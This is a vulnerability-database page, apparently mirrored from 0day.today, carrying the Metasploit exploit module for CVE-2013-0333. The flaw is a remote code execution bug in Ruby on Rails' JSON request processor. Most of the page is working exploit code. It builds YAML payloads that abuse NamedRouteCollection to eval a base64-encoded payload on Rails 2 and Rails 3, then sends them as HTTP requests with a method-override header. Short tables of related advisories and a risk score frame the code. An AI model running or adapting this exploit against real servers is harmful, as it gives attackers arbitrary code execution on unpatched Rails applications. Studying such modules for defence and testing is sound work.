Ruby on Rails JSON Processor YAML Deserialization Code Execution

🗓️ 29 Jan 2013 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 40 Views

Exploiting remote code execution vulnerability in Ruby on Rails JSON Processor YAML Deserializatio

Reporter	Title	Published	Views	Family All 182
0day.today	Action Pack Multiple Vulnerabilities	9 Jan 201300:00	–	zdt
0day.today	Ruby On Rails XML Processor YAML Deserialization Code Execution	11 Jan 201300:00	–	zdt
IBM Security Bulletins	Security Bulletin: IBM Security Network Intrusion Prevention System can be affected by vulnerabilities in Ruby on Rails (CVE-2012-2660, CVE-2012-2694, CVE-2013-0156, CVE-2012-6496, CVE-2012-3424, and CVE-2012-2695)	25 Jan 202120:13	–	ibm
GithubExploit	Exploit for Improper Input Validation in Rubyonrails Rails	28 Aug 202522:15	–	githubexploit
GithubExploit	Exploit for Improper Input Validation in Rubyonrails Rails	12 Jan 201313:37	–	githubexploit
Tenable Nessus	Mac OS X 10.8 < 10.8.3 Multiple Vulnerabilities (Security Update 2013-001)	16 Mar 201300:00	–	nessus
Tenable Nessus	Mac OS X 10.8 < 10.8.3 Multiple Vulnerabilities (Security Update 2013-001)	16 Mar 201300:00	–	nessus
Tenable Nessus	Debian DLA-172-1 : libextlib-ruby security update	26 Mar 201500:00	–	nessus
Tenable Nessus	Debian DSA-2604-1 : rails - insufficient input validation	10 Jan 201300:00	–	nessus
Tenable Nessus	Debian DSA-2613-1 : rails - insufficient input validation	31 Jan 201300:00	–	nessus

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::CmdStagerTFTP
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
            'Description'    => %q{
                    This module exploits a remote code execution vulnerability in the
                JSON request processor of the Ruby on Rails application framework.
                This vulnerability allows an attacker to instantiate a remote object,
                which in turn can be used to execute any ruby code remotely in the
                context of the application. This vulnerability is very similar to
                CVE-2013-0156.
 
                This module has been tested successfully on RoR 3.0.9, 3.0.19, and
                2.3.15.
 
                The technique used by this module requires the target to be running a
                fairly recent version of Ruby 1.9 (since 2011 or so). Applications
                using Ruby 1.8 may still be exploitable using the init_with() method,
                but this has not been demonstrated.
 
            },
            'Author'         =>
                [
                    'jjarmoc',  # Initial module based on cve-2013-0156, testing help
                    'egypt',    # Module
                    'lian',     # Identified the RouteSet::NamedRouteCollection vector
                ],
            'License'        => MSF_LICENSE,
            'References'  =>
                [
                    ['CVE', '2013-0333'],
                ],
            'Platform'       => 'ruby',
            'Arch'           => ARCH_RUBY,
            'Privileged'     => false,
            'Targets'        =>  [ ['Automatic', {} ] ],
            'DisclosureDate' => 'Jan 28 2013',
            'DefaultOptions' => { "PrependFork" => true },
            'DefaultTarget' => 0))
 
        register_options(
            [
                Opt::RPORT(80),
                OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
                OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
 
            ], self.class)
 
    end
 
    #
    # Create the YAML document that will be embedded into the JSON
    #
    def build_yaml_rails2
 
        code = Rex::Text.encode_base64(payload.encoded)
        yaml =
            "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
            "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
            "eval(%[#{code}].unpack(%[m0])[0]);' " +
            ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
            ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
            ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
        yaml.gsub(':', '\u003a')
    end
 
 
    #
    # Create the YAML document that will be embedded into the JSON
    #
    def build_yaml_rails3
 
        code = Rex::Text.encode_base64(payload.encoded)
        yaml =
            "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
            "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
            ": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
        yaml.gsub(':', '\u003a')
    end
 
    def build_request(v)
        case v
        when 2; build_yaml_rails2
        when 3; build_yaml_rails3
        end
    end
 
    #
    # Send the actual request
    #
    def exploit
 
        [2, 3].each do |ver|
            print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
            send_request_cgi({
                'uri'     => normalize_uri(target_uri.path),
                'method'  => datastore['HTTP_METHOD'],
                'ctype'   => 'application/json',
                'headers' => { 'X-HTTP-Method-Override' => 'get' },
                'data'    => build_request(ver)
            }, 25)
            handler
        end
 
    end
end

#  0day.today [2018-04-08]  #

29 Jan 2013 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.91907